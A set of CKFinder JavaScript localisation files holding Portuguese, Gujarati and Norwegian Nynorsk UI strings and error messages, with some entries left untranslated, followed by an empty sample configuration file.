' (Renomeando...)', FolderDeleting : ' (Apagando...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Favor informar o nome do novo arquivo: ', FileRenameExt : 'Você tem certeza que deseja alterar a extensão do arquivo? O arquivo pode ser danificado.', FileRenaming : 'Renomeando...', FileDelete : 'Você tem certeza que deseja apagar o arquivo "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Carregando...', FilesEmpty : 'Pasta vazia', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Cesta', BasketClear : 'Limpa Cesta', BasketRemove : 'Remove da cesta', BasketOpenFolder : 'Abre a pasta original', BasketTruncateConfirm : 'Remover todos os arquivas da cesta?', BasketRemoveConfirm : 'Remover o arquivo "%1" da cesta?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Nenhum arquivo na cesta, arraste alguns antes.', BasketCopyFilesHere : 'Copia Arquivos da Cesta', BasketMoveFilesHere : 'Move os Arquivos da Cesta', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Enviar arquivo', UploadTip : 'Enviar novo arquivo', Refresh : 'Atualizar', Settings : 'Configurações', Help : 'Ajuda', HelpTip : 'Ajuda', // Context Menus Select : 'Selecionar', SelectThumbnail : 'Selecionar miniatura', View : 'Visualizar', Download : 'Download', NewSubFolder : 'Nova sub-pasta', Rename : 'Renomear', Delete : 'Apagar', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Copia aqui', MoveDragDrop : 'Move aqui', // Dialogs RenameDlgTitle : 'Renomeia', NewNameDlgTitle : 'Novo nome', FileExistsDlgTitle : 'O arquivo já existe', SysErrorDlgTitle : 'Erro de Sistema', FileOverwrite : 'Sobrescrever', FileAutorename : 'Renomeia automaticamente', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Cancelar', CloseBtn : 'Fechar', // Upload Panel UploadTitle : 'Enviar novo arquivo', UploadSelectLbl : 'Selecione o arquivo para enviar', UploadProgressLbl : '(Enviado arquivo, favor aguardar...)', UploadBtn : 'Enviar arquivo selecionado', UploadBtnCancel : 'Cancelar', UploadNoFileMsg : 'Favor selecionar o arquivo no seu computador.', UploadNoFolder : 'Favor selecionar a pasta antes the enviar o arquivo.', UploadNoPerms : 'Não é permitido o envio de arquivos.', UploadUnknError : 'Erro no envio do arquivo.', UploadExtIncorrect : 'A extensão deste arquivo não é permitida nesat pasta.', // Flash Uploads UploadLabel : 'Arquivos para Enviar', UploadTotalFiles : 'Arquivos:', UploadTotalSize : 'Tamanho:', UploadSend : 'Enviar arquivo', UploadAddFiles : 'Adicionar Arquivos', UploadClearFiles : 'Remover Arquivos', UploadCancel : 'Cancelar Envio', UploadRemove : 'Remover', UploadRemoveTip : 'Remover !f', UploadUploaded : '!n% enviado', UploadProcessing : 'Processando...', // Settings Panel SetTitle : 'Configurações', SetView : 'Visualizar:', SetViewThumb : 'Miniaturas', SetViewList : 'Lista', SetDisplay : 'Exibir:', SetDisplayName : 'Arquivo', SetDisplayDate : 'Data', SetDisplaySize : 'Tamanho', SetSort : 'Ordenar:', SetSortName : 'por Nome do arquivo', SetSortDate : 'por Data', SetSortSize : 'por Tamanho', SetSortExtension : 'por Extensão', // Status Bar FilesCountEmpty : '<Pasta vazia>', FilesCountOne : '1 arquivo', FilesCountMany : '%1 arquivos', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Não foi possível completer o seu pedido. (Erro %1)', Errors : { 10 : 'Comando inválido.', 11 : 'O tipo de recurso não foi especificado na solicitação.', 12 : 'O recurso solicitado não é válido.', 102 : 'Nome do arquivo ou pasta inválido.', 103 : 'Não foi possível completar a solicitação por restrições de acesso.', 104 : 'Não foi possível completar a solicitação por restrições de acesso do sistema de arquivos.', 105 : 'Extensão de arquivo inválida.', 109 : 'Solicitação inválida.', 110 : 'Erro desconhecido.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Uma arquivo ou pasta já existe com esse nome.', 116 : 'Pasta não encontrada. Atualize e tente novamente.', 117 : 'Arquivo não encontrado. Atualize a lista de arquivos e tente novamente.', 118 : 'Origem e destino são iguais.', 201 : 'Um arquivo com o mesmo nome já está disponível. O arquivo enviado foi renomeado para "%1".', 202 : 'Arquivo inválido.', 203 : 'Arquivo inválido. O tamanho é muito grande.', 204 : 'O arquivo enviado está corrompido.', 205 : 'Nenhuma pasta temporária para envio está disponível no servidor.', 206 : 'Transmissão cancelada por razões de segurança. O arquivo contem dados HTML.', 207 : 'O arquivo enviado foi renomeado para "%1".', 300 : 'Não foi possível mover o(s) arquivo(s).', 301 : 'Não foi possível copiar o(s) arquivos(s).', 500 : 'A navegação de arquivos está desativada por razões de segurança. Contacte o administrador do sistema.', 501 : 'O suporte a miniaturas está desabilitado.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'O nome do arquivo não pode ser vazio.', FileExists : 'O nome %s já é em uso.', FolderEmpty : 'O nome da pasta não pode ser vazio.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'O nome do arquivo não pode conter nenhum desses caracteres: \n\\ / : * ? " < > |', FolderInvChar : 'O nome da pasta não pode conter nenhum desses caracteres: \n\\ / : * ? " < > |', PopupBlockView : 'Não foi possível abrir o arquivo em outra janela. Configure seu navegador e desabilite o bloqueio a popups para esse site.', XmlError : 'Não foi possível carregar a resposta XML enviada pelo servidor.', XmlEmpty : 'Não foi possível carregar a resposta XML enviada pelo servidor. Resposta vazia..', XmlRawResponse : 'Resposta original enviada pelo servidor: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Redimensionar %s', sizeTooBig : 'Não possível usar dimensões maiores do que as originais (%size).', resizeSuccess : 'Imagem redimensionada corretamente.', thumbnailNew : 'Cria nova anteprima', thumbnailSmall : 'Pequeno (%s)', thumbnailMedium : 'Médio (%s)', thumbnailLarge : 'Grande (%s)', newSize : 'Novas dimensões', width : 'Largura', height : 'Altura', invalidHeight : 'Altura incorreta.', invalidWidth : 'Largura incorreta.', invalidName : 'O nome do arquivo não é válido.', newImage : 'Cria nova imagem', noExtensionChange : 'A extensão do arquivo não pode ser modificada.', imageSmall : 'A imagem original é muito pequena.', contextMenuName : 'Redimensionar', lockRatio : 'Travar Proporções', resetSize : 'Redefinir para o Tamanho Original' }, // Fileeditor plugin Fileeditor : { save : 'Salva', fileOpenError : 'Não é possível abrir o arquivo.', fileSaveSuccess : 'Arquivo salvado corretamente.', contextMenuName : 'Modificar', loadingFile : 'Carregando arquivo. Por favor aguarde...' }, Maximize : { maximize : 'Maximizar', minimize : 'Minimizar' }, Gallery : { current : 'Imagem {current} de {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Gujarati * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['gu'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, નથી.</span>', confirmCancel : 'ઘણા વિકલ્પો બદલાયા છે. તમારે શું આ બોક્ષ્ બંધ કરવું છે?', ok : 'ઓકે', cancel : 'રદ કરવું', confirmationTitle : 'કન્ફર્મે', messageTitle : 'માહિતી', inputTitle : 'પ્રશ્ન', undo : 'અન્ડું', redo : 'રીડુ', skip : 'સ્કીપ', skipAll : 'બધા સ્કીપ', makeDecision : 'તમારે શું કરવું છે?', rememberDecision: 'મારો વિકલ્પ યાદ રાખો' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'gu', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'm/d/yyyy h:MM aa', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'ફોલ્ડર્સ', FolderLoading : 'લોડીંગ...', FolderNew : 'નવું ફોલ્ડર નું નામ આપો: ', FolderRename : 'નવું ફોલ્ડર નું નામ આપો: ', FolderDelete : 'શું તમારે "%1" ફોલ્ડર ડિલીટ કરવું છે?', FolderRenaming : ' (નવું નામ...)', FolderDeleting : ' (ડિલીટ...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'નવી ફાઈલ નું નામ આપો: ', FileRenameExt : 'છું તમારે ફાઈલ એક્ષ્તેન્શન્ બદલવું છે? તે ફાઈલ પછી નહી વપરાય.', FileRenaming : 'નવું નામ...', FileDelete : 'શું તમારે "%1" ફાઈલ ડિલીટ કરવી છે?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'લોડીંગ...', FilesEmpty : 'આ ફોલ્ડર ખાલી છે.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'બાસ્કેટ', BasketClear : 'બાસ્કેટ ખાલી કરવી', BasketRemove : 'બાસ્કેટ માં થી કાઢી નાખવું', BasketOpenFolder : 'પેરન્ટ ફોલ્ડર ખોલવું', BasketTruncateConfirm : 'શું તમારે બાસ્કેટ માંથી બધી ફાઈલ કાઢી નાખવી છે?', BasketRemoveConfirm : 'તમારે "%1" ફાઈલ બાસ્કેટ માંથી કાઢી નાખવી છે?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'બાસ્કેટ માં એક પણ ફાઈલ નથી, ડ્રેગ અને ડ્રોપ કરો.', BasketCopyFilesHere : 'બાસ્કેટમાંથી ફાઈલ કોપી કરો', BasketMoveFilesHere : 'બાસ્કેટમાંથી ફાઈલ મુવ કરો', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'અપલોડ', UploadTip : 'અપલોડ નવી ફાઈલ', Refresh : 'રીફ્રેશ', Settings : 'સેટીંગ્સ', Help : 'મદદ', HelpTip : 'મદદ', // Context Menus Select : 'પસંદ કરો', SelectThumbnail : 'થમ્બનેલ પસંદ કરો', View : 'વ્યુ', Download : 'ડાઊનલોડ', NewSubFolder : 'નવું સ્બફોલડર', Rename : 'નવું નામ', Delete : 'કાઢી નાખવું', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'અહિયાં ફાઈલ કોપી કરો', MoveDragDrop : 'અહિયાં ફાઈલ મુવ કરો', // Dialogs RenameDlgTitle : 'નવું નામ', NewNameDlgTitle : 'નવું નામ', FileExistsDlgTitle : 'ફાઈલ છે', SysErrorDlgTitle : 'સિસ્ટમ એરર', FileOverwrite : 'ફાઈલ બદલવી છે', FileAutorename : 'આટો-નવું નામ', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'ઓકે', CancelBtn : 'કેન્સલ', CloseBtn : 'બંધ', // Upload Panel UploadTitle : 'નવી ફાઈલ અપલોડ કરો', UploadSelectLbl : 'અપલોડ માટે ફાઈલ પસંદ કરો', UploadProgressLbl : '(અપલોડ થાય છે, રાહ જુવો...)', UploadBtn : 'પસંદ કરેલી ફાઈલ અપલોડ કરો', UploadBtnCancel : 'રદ કરો', UploadNoFileMsg : 'તમારા કોમ્પુટર પરથી ફાઈલ પસંદ કરો.', UploadNoFolder : 'અપલોડ કરતા પેહલાં ફોલ્ડર પસંદ કરો.', UploadNoPerms : 'ફાઈલ અપલોડ શક્ય નથી.', UploadUnknError : 'ફાઈલ મોકલવામાં એરર છે.', UploadExtIncorrect : 'આ ફોલ્ડરમાં આ એક્ષટેનસન શક્ય નથી.', // Flash Uploads UploadLabel : 'અપલોડ કરવાની ફાઈલો', UploadTotalFiles : 'ટોટલ ફાઈલ્સ:', UploadTotalSize : 'ટોટલ જગ્યા:', UploadSend : 'અપલોડ', UploadAddFiles : 'ફાઈલ ઉમેરો', UploadClearFiles : 'ક્લીયર ફાઈલ્સ', UploadCancel : 'અપલોડ રદ કરો', UploadRemove : 'રીમૂવ', UploadRemoveTip : 'રીમૂવ !f', UploadUploaded : 'અપ્લોડેડ !n%', UploadProcessing : 'પ્રોસેસ ચાલુ છે...', // Settings Panel SetTitle : 'સેટિંગ્સ', SetView : 'વ્યુ:', SetViewThumb : 'થામ્ન્બનેલ્સ', SetViewList : 'લીસ્ટ', SetDisplay : 'ડિસ્પ્લે:', SetDisplayName : 'ફાઈલનું નામ', SetDisplayDate : 'તારીખ', SetDisplaySize : 'ફાઈલ સાઈઝ', SetSort : 'સોર્ટિંગ:', SetSortName : 'ફાઈલના નામ પર', SetSortDate : 'તારીખ પર', SetSortSize : 'સાઈઝ પર', SetSortExtension : 'એક્ષટેનસન પર', // Status Bar FilesCountEmpty : '<ફોલ્ડર ખાલી>', FilesCountOne : '1 ફાઈલ', FilesCountMany : '%1 ફાઈલો', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'તમારી રીક્વેસ્ટ માન્ય નથી. (એરર %1)', Errors : { 10 : 'કમાંડ માન્ય નથી.', 11 : 'તમારી રીક્વેસ્ટ માન્ય નથી.', 12 : 'તમારી રીક્વેસ્ટ રિસોર્સ માન્ય નથી.', 102 : 'ફાઈલ અથવા ફોલ્ડરનું નામ માન્ય નથી.', 103 : 'ઓથોરીટી ન હોવાને કારણે, તમારી રીક્વેસ્ટ માન્ય નથી..', 104 : 'સિસ્ટમ પરમીસન ન હોવાને કારણે, તમારી રીક્વેસ્ટ માન્ય નથી.', 105 : 'ફાઈલ એક્ષટેનસન માન્ય નથી.', 109 : 'ઇનવેલીડ રીક્વેસ્ટ.', 110 : 'અન્નોન એરર.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'એજ નામ વાળું ફાઈલ અથવા ફોલ્ડર છે.', 116 : 'ફોલ્ડર નથી. રીફ્રેશ દબાવી ફરી પ્રયત્ન કરો.', 117 : 'ફાઈલ નથી. રીફ્રેશ દબાવી ફરી પ્રયત્ન કરો..', 118 : 'સોર્સ અને ટાર્ગેટ ના પાથ સરખા નથી.', 201 : 'એજ નામ વાળી ફાઈલ છે. અપલોડ કરેલી નવી ફાઈલનું નામ "%1".', 202 : 'ફાઈલ માન્ય નથી.', 203 : 'ફાઈલ માન્ય નથી. ફાઈલની સાઈઝ ઘણી મોટી છે.', 204 : 'અપલોડ કરેલી ફાઈલ કરપ્ટ છે.', 205 : 'સર્વર પર અપલોડ કરવા માટે ટેમ્પરરી ફોલ્ડર નથી.', 206 : 'સિક્યોરીટીના કારણે અપલોડ કેન્સલ કરેલ છે. ફાઈલમાં HTML જેવો ડેટા છે.', 207 : 'અપલોડ ફાઈલનું નવું નામ "%1".', 300 : 'ફાઈલ મુવ શક્ય નથી.', 301 : 'ફાઈલ કોપી શક્ય નથી.', 500 : 'સિક્યોરીટીના કારણે ફાઈલ બ્રાઉઝર બંધ કરેલ છે. તમારા સિક્યોરીટી એડ્મીનીસ્ટેટરની મદદથી CKFinder કોન્ફીગ્યુંરેષન ફાઈલ તપાસો.', 501 : 'થમ્બનેલનો સપોર્ટ બંધ કરેલો છે.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'ફાઈલનું નામ ખાલીના હોવું જોઈએ', FileExists : 'ફાઈલ %s હાજર છે.', FolderEmpty : 'ફોલ્ડરનું નામ ખાલીના હોવું જોઈએ.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'ફાઈલના નામમાં એમના કોઈ પણ કેરેક્ટર ન ચાલે: \n\\ / : * ? " < > |', FolderInvChar : 'ફોલ્ડરના નામમાં એમના કોઈ પણ કેરેક્ટર ન ચાલે: \n\\ / : * ? " < > |', PopupBlockView : 'નવી વિન્ડોમાં ફાઈલ ખોલવી શક્ય નથી. તમારું બ્રાઉઝર કોન્ફીગ કરી અને આ સાઈટ માટેના બથા પોપઅપ બ્લોકર બંધ કરો.', XmlError : 'વેબ સર્વેરમાંથી XML રીર્સ્પોન્સ લેવો શક્ય નથી.', XmlEmpty : 'વેબ સર્વેરમાંથી XML રીર્સ્પોન્સ લેવો શક્ય નથી. સર્વરે ખાલી રિસ્પોન્સ આપ્યો.', XmlRawResponse : 'સર્વર પરનો રો રિસ્પોન્સ: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'રીસાઈઝ %s', sizeTooBig : 'ચિત્રની પોહાલાઈ અને લંબાઈ ઓરીજીનલ ચિત્ર કરતા મોટી ન હોઈ શકે (%size).', resizeSuccess : 'ચિત્ર રીસાઈઝ .', thumbnailNew : 'નવો થમ્બનેલ બનાવો', thumbnailSmall : 'નાનું (%s)', thumbnailMedium : 'મધ્યમ (%s)', thumbnailLarge : 'મોટું (%s)', newSize : 'નવી સાઈઝ', width : 'પોહાલાઈ', height : 'ઊંચાઈ', invalidHeight : 'ઊંચાઈ ખોટી છે.', invalidWidth : 'પોહાલાઈ ખોટી છે.', invalidName : 'ફાઈલનું નામ ખોટું છે.', newImage : 'નવી ઈમેજ બનાવો', noExtensionChange : 'ફાઈલ એક્ષ્ટેન્શન બદલી શકાય નહી.', imageSmall : 'સોર્સ ઈમેજ નાની છે.', contextMenuName : 'રીસાઈઝ', lockRatio : 'લોક રેષીઓ', resetSize : 'રીસેટ સાઈઝ' }, // Fileeditor plugin Fileeditor : { save : 'સેવ', fileOpenError : 'ફાઈલ ખોલી સકાય નહી.', fileSaveSuccess : 'ફાઈલ સેવ થઈ ગઈ છે.', contextMenuName : 'એડીટ', loadingFile : 'લોડીંગ ફાઈલ, રાહ જુવો...' }, Maximize : { maximize : 'મેક્ષિમાઈઝ', minimize : 'મિનીમાઈઝ' }, Gallery : { current : 'ઈમેજ {current} બધામાંથી {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Norwegian * Nynorsk language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['nn'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, utilgjenglig</span>', confirmCancel : 'Noen av valgene har blitt endret. Er du sikker på at du vil lukke dialogen?', ok : 'OK', cancel : 'Avbryt', confirmationTitle : 'Bekreftelse', messageTitle : 'Informasjon', inputTitle : 'Spørsmål', undo : 'Angre', redo : 'Gjør om', skip : 'Hopp over', skipAll : 'Hopp over alle', makeDecision : 'Hvilken handling skal utføres?', rememberDecision: 'Husk mitt valg' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'nn', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy HH:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Mapper', FolderLoading : 'Laster...', FolderNew : 'Skriv inn det nye mappenavnet: ', FolderRename : 'Skriv inn det nye mappenavnet: ', FolderDelete : 'Er du sikker på at du vil slette mappen "%1"?', FolderRenaming : ' (Endrer mappenavn...)', FolderDeleting : ' (Sletter...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Skriv inn det nye filnavnet: ', FileRenameExt : 'Er du sikker på at du vil endre filtypen? Filen kan bli ubrukelig.', FileRenaming : 'Endrer filnavn...', FileDelete : 'Er du sikker på at du vil slette denne filen "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 'Laster...', FilesEmpty : 'Denne katalogen er tom.', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : 'Kurv', BasketClear : 'Tøm kurv', BasketRemove : 'Fjern fra kurv', BasketOpenFolder : 'Åpne foreldremappen', BasketTruncateConfirm : 'Vil du virkelig fjerne alle filer fra kurven?', BasketRemoveConfirm : 'Vil du virkelig fjerne filen "%1" fra kurven?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'Ingen filer i kurven, dra og slipp noen.', BasketCopyFilesHere : 'Kopier filer fra kurven', BasketMoveFilesHere : 'Flytt filer fra kurven', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'Last opp', UploadTip : 'Last opp en ny fil', Refresh : 'Oppdater', Settings : 'Innstillinger', Help : 'Hjelp', HelpTip : 'Hjelp finnes kun på engelsk', // Context Menus Select : 'Velg', SelectThumbnail : 'Velg miniatyr', View : 'Vis fullversjon', Download : 'Last ned', NewSubFolder : 'Ny undermappe', Rename : 'Endre navn', Delete : 'Slett', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : 'Kopier hit', MoveDragDrop : 'Flytt hit', // Dialogs RenameDlgTitle : 'Gi nytt navn', NewNameDlgTitle : 'Nytt navn', FileExistsDlgTitle : 'Filen finnes allerede', SysErrorDlgTitle : 'Systemfeil', FileOverwrite : 'Overskriv', FileAutorename : 'Gi nytt navn automatisk', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : 'OK', CancelBtn : 'Avbryt', CloseBtn : 'Lukk', // Upload Panel UploadTitle : 'Last opp ny fil', UploadSelectLbl : 'Velg filen du vil laste opp', UploadProgressLbl : '(Laster opp filen, vennligst vent...)', UploadBtn : 'Last opp valgt fil', UploadBtnCancel : 'Avbryt', UploadNoFileMsg : 'Du må velge en fil fra din datamaskin', UploadNoFolder : 'Vennligst velg en mappe før du laster opp.', UploadNoPerms : 'Filopplastning er ikke tillatt.', UploadUnknError : 'Feil ved sending av fil.', UploadExtIncorrect : 'Filtypen er ikke tillatt i denne mappen.', // Flash Uploads UploadLabel : 'Filer for opplastning', UploadTotalFiles : 'Totalt antall filer:', UploadTotalSize : 'Total størrelse:', UploadSend : 'Last opp', UploadAddFiles : 'Legg til filer', UploadClearFiles : 'Tøm filer', UploadCancel : 'Avbryt opplastning', UploadRemove : 'Fjern', UploadRemoveTip : 'Fjern !f', UploadUploaded : 'Lastet opp !n%', UploadProcessing : 'Behandler...', // Settings Panel SetTitle : 'Innstillinger', SetView : 'Filvisning:', SetViewThumb : 'Miniatyrbilder', SetViewList : 'Liste', SetDisplay : 'Vis:', SetDisplayName : 'Filnavn', SetDisplayDate : 'Dato', SetDisplaySize : 'Filstørrelse', SetSort : 'Sorter etter:', SetSortName : 'Filnavn', SetSortDate : 'Dato', SetSortSize : 'Størrelse', SetSortExtension : 'Filetternavn', // Status Bar FilesCountEmpty : '<Tom Mappe>', FilesCountOne : '1 fil', FilesCountMany : '%1 filer', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'Det var ikke mulig å utføre forespørselen. (Feil %1)', Errors : { 10 : 'Ugyldig kommando.', 11 : 'Ressurstypen ble ikke spesifisert i forepørselen.', 12 : 'Ugyldig ressurstype.', 102 : 'Ugyldig fil- eller mappenavn.', 103 : 'Kunne ikke utføre forespørselen pga manglende autorisasjon.', 104 : 'Kunne ikke utføre forespørselen pga manglende tilgang til filsystemet.', 105 : 'Ugyldig filtype.', 109 : 'Ugyldig forespørsel.', 110 : 'Ukjent feil.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Det finnes allerede en fil eller mappe med dette navnet.', 116 : 'Kunne ikke finne mappen. Oppdater vinduet og prøv igjen.', 117 : 'Kunne ikke finne filen. Oppdater vinduet og prøv igjen.', 118 : 'Kilde- og mål-bane er like.', 201 : 'Det fantes allerede en fil med dette navnet. Den opplastede filens navn har blitt endret til "%1".', 202 : 'Ugyldig fil.', 203 : 'Ugyldig fil. Filen er for stor.', 204 : 'Den opplastede filen er korrupt.', 205 : 'Det finnes ingen midlertidig mappe for filopplastinger.', 206 : 'Opplastingen ble avbrutt av sikkerhetshensyn. Filen inneholder HTML-aktig data.', 207 : 'Den opplastede filens navn har blitt endret til "%1".', 300 : 'Klarte ikke å flytte fil(er).', 301 : 'Klarte ikke å kopiere fil(er).', 500 : 'Filvelgeren ikke tilgjengelig av sikkerhetshensyn. Kontakt systemansvarlig og be han sjekke CKFinder\'s konfigurasjonsfil.', 501 : 'Funksjon for minityrbilder er skrudd av.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Filnavnet kan ikke være tomt.', FileExists : 'Filen %s finnes alt.', FolderEmpty : 'Mappenavnet kan ikke være tomt.', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : 'Filnavnet kan ikke inneholde følgende tegn: \n\\ / : * ? " < > |', FolderInvChar : 'Mappenavnet kan ikke inneholde følgende tegn: \n\\ / : * ? " < > |', PopupBlockView : 'Du må skru av popup-blockeren for å se bildet i nytt vindu.', XmlError : 'Det var ikke mulig å laste XML-dataene i svaret fra serveren.', XmlEmpty : 'Det var ikke mulig å laste XML-dataene fra serverne, svaret var tomt.', XmlRawResponse : 'Rått datasvar fra serveren: %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Endre størrelse %s', sizeTooBig : 'Kan ikke sette høyde og bredde til større enn orginalstørrelse (%size).', resizeSuccess : 'Endring av bildestørrelse var vellykket.', thumbnailNew : 'Lag ett nytt miniatyrbilde', thumbnailSmall : 'Liten (%s)', thumbnailMedium : 'Medium (%s)', thumbnailLarge : 'Stor (%s)', newSize : 'Sett en ny størrelse', width : 'Bredde', height : 'Høyde', invalidHeight : 'Ugyldig høyde.', invalidWidth : 'Ugyldig bredde.', invalidName : 'Ugyldig filnavn.', newImage : 'Lag ett nytt bilde', noExtensionChange : 'Filendelsen kan ikke endres.', imageSmall : 'Kildebildet er for lite.', contextMenuName : 'Endre størrelse', lockRatio : 'Lås forhold', resetSize : 'Tilbakestill størrelse' }, // Fileeditor plugin Fileeditor : { save : 'Lagre', fileOpenError : 'Klarte ikke å åpne filen.', fileSaveSuccess : 'Fillagring var vellykket.', contextMenuName : 'Rediger', loadingFile : 'Laster fil, vennligst vent...' }, Maximize : { maximize : 'Maksimer', minimize : 'Minimer' }, Gallery : { current : 'Bilde {current} av {total}' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or http://cksource.com/ckfinder/license */ CKFinder.customConfig = function( config ) { // Define changes to default configuration here. // For the list of available options, check: // http://docs.cksource.com/ckfinder_2.x_api/symbols/CKFinder.config.html // Sample configuration options: // config.uiColor = '#BDE31E'; // config.language = 'fr'; // config.removePlugins = 'basket'; };
JavaScript
